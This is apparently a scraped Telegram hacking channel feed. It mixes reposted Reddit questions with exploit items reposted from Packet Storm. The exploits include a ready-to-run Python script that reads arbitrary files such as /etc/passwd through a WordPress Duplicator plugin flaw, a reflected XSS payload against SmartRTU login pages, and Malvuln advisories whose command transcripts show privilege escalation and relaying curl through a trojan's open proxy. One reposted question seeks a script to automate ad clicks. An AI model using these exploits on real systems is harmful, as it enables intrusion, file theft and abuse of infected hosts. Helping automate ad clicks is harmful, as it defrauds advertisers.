Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.6K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Forgot Bitlocker password...

So, i found a USB drive i had encrypted a while ago using bitlocker. And for the life of me i can not find the recovery key! I thought i remembered the password but it says it's wrong every time I enter it. I have a few important work files in it. Is there a way to bypass bitlocker?

submitted by /u/TheN1ght0w1
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
How do offline games still manage to protect them sleves from value hacks without multipling values?

Hi i think the question is obvious. So a while ago i tried to hack a game with game gurdian (Its offline, doesn't rely on servers) but then came the shock, whenever i change anything it changes back instantly even if frozen then i decided to use BlueStacks with cheat engine, boom again same results Long story short i gave up -_-. So After A While I Came by another game wich did the same weird thing is the game between them and before them were changing good. So can anybody tell me why ,how or atleast how to prevent it.

Thanks.

Games i was talking about list: Botworld Angrybirds Transformers "I lost the third game sry"

submitted by /u/Bogienin
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Is it possible to create a script to automate clicking on brave ads?

I want to create a script that automatically clicks on brave ads every time they appear, but I have no idea where to begin. Is this possible and if it is, could you give me some insight on how to do it?

submitted by /u/iamfeelings
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Buffer Overflows on android?

Wassup hackers.

Lately I've been learning about buffer overflows. I managed to take over my PC with my laptop via vulnserver. I think many people are aware of Vulnserver, But for the people who aren't. Vulnserver is a server that you can download and run on your own pc. It contains a couple of executables that you can crack. So I managed to get a buffer overflow in the TRUN application for example. But to do that I had to have the vulnserver with that application running ofcourse. But let's say I have a different application than Vulnserver running. How would I attack the application then? And would it be possible to run such attacks on android apps also?

Thanks in advance.

submitted by /u/Mario64Remasterdpls
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Spy.Win32.Ardamax.ocx Insecure Permissions

https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Trojan-Spy.Win32.Ardamax.ocx malware suffers from an insecure permissions vulnerability.

MD5 | 1958fc9f88dc93972c6926deb4aa378b

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/78a39875a0adb110cf3c7de3a0d1384c.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan-Spy.Win32.Ardamax.ocx
Vulnerability: Insecure Permissions
Description: The malware creates an dir named "MUWOCI" or "28463" with insecure permissions under Windows\SysWOW64 granting full (F) permissions to the Everyone user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 78a39875a0adb110cf3c7de3a0d1384c
Vuln ID: MVID-2021-0362
Disclosure: 10/15/2021

Exploit/PoC:
C:\Windows\SysWOW64\MUWOCI>cacls HNI.001
C:\Windows\SysWOW64\MUWOCI\HNI.001 Everyone:(ID)F

C:\Windows\SysWOW64\MUWOCI>cd ..

C:\Windows\SysWOW64>cacls MUWOCI

C:\Windows\SysWOW64\MUWOCI Everyone:F
Everyone:(OI)(CI)(IO)F
C:\Windows\SysWOW64>dir MUWOCI
Volume in drive C has no label.

Directory of C:\Windows\SysWOW64\MUWOCI

10/05/2021 10:11 PM 62,464 HNI.001
1 File(s) 62,464 bytes
C:\Windows\SysWOW64>cacls 28463
C:\Windows\SysWOW64\28463 Everyone:F
Everyone:(OI)(CI)(IO)F
C:\Windows\SysWOW64>dir 28463
Volume in drive C has no label.

Directory of C:\Windows\SysWOW64\28463

10/05/2021 10:17 PM 402,944 AKV.exe
10/05/2021 10:17 PM 482 DQOC.001
10/05/2021 10:17 PM 7,680 DQOC.006
10/05/2021 10:17 PM 5,632 DQOC.007
10/05/2021 10:17 PM 483,840 DQOC.exe
5 File(s) 900,578 bytes
C:\Windows\SysWOW64>cacls 28463
C:\Windows\SysWOW64\28463 Everyone:F
Everyone:(OI)(CI)(IO)F
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Proxy.Win32.Ranky.dh Unauthenticated Open Proxy

https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
Trojan-Proxy.Win32.Ranky.dh malware suffers from an unauthenticated open proxy vulnerability.

MD5 | d05d94921a4f52689fa2065c5b1708df

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/dcc58648868f1d5c0d7c53250f1bd5c9.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan-Proxy.Win32.Ranky.dh
Vulnerability: Unauthenticated Open Proxy
Description: The malware listens on TCP port 17503. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.
Type: PE32
MD5: dcc58648868f1d5c0d7c53250f1bd5c9
Vuln ID: MVID-2021-0364
Disclosure: 10/15/2021

Exploit/PoC:
Port scan)

curl -x http://192.168.18.125:17503 http://192.168.18.128:21
220 INetSim FTP Service ready.
500 Unknown command.

Download filez)

curl -x http://192.168.18.125:17503 http://192.168.18.128/DOOM.exe --output DOOM.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 24576 100 24576 0 0 6144 0 0:00:04 0:00:04 --:--:-- 5957
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Duplicator 1.3.26 Arbitrary File Read

https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
WordPress Duplicator plugin version 1.3.26 suffers from an unauthenticated arbitrary file read vulnerability.

MD5 | 18669dd16268ad8eff125d1a41041c75

Download
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738

import requests as re
import sys

if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()

arg = sys.argv[1]
file = sys.argv[2]

URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file

output = re.get(url = URL)
print(output.text)

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Mitsubishi Electric / INEA SmartRTU Cross Site Scripting

https://2.bp.blogspot.com/-ulQQD3v8DYI/WWlvnLww_dI/AAAAAAAAIRM/ialO7Idq8vAmWKoyuXUdK7x44tFKJsnBwCLcBGAs/s1600/hack_img4.png
Mitsubishi Electric and INEA SmartRTU suffer from a cross site scripting vulnerability.

MD5 | 1bf870c75a7a097da8ec1aaeb1ba24f0

Download
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16061
# PoC
# Request

POST
/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%
3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
Host: **.**.**.***
Content-Length: 132
Cache-Control: max-age=0
Origin: http://**.**.**.***
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/68.0.3440.84
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://**.**.**.***sss/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
Connection: close

submitted=1&username=--
%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw
ord=&Submit=Login

# Response

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:14:25 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4
Vary: Accept-Encoding
Content-Length: 3573
Connection: close
Content-Type: text/html
action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8'
method='post' accept-charset='UTF-8'>
Reference :

https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view



Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video